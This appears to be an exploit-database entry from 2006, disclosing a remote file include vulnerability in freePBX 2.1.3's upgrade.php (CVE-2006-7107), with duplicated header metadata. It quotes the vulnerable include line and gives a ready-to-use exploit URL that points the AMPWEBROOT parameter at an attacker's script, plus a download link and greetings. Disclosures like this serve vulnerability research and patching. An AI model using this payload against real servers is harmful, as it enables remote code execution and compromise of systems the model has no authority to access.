freePBX 2.1.3 (upgrade.php) Remote File Include Vulnerability
| EDB-ID: 2665 | CVE: 2006-7107 | OSVDB-ID: 34694 |
| Author: xoron | Published: 2006-10-28 | Verified:  |
Exploit Code:  | Vulnerable App: N/A |
Rating |
| EDB-ID: 2665 | CVE: 2006-7107 | OSVDB-ID: 34694 |
| Author: xoron | Published: 2006-10-28 | Verified: |
| Exploit Code: | Vulnerable App: N/A |
Rating |
Script: freePBX Version: v2.1.3 Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php"); Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts? Found: Cyber-Security Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide # milw0rm.com [2006-10-28]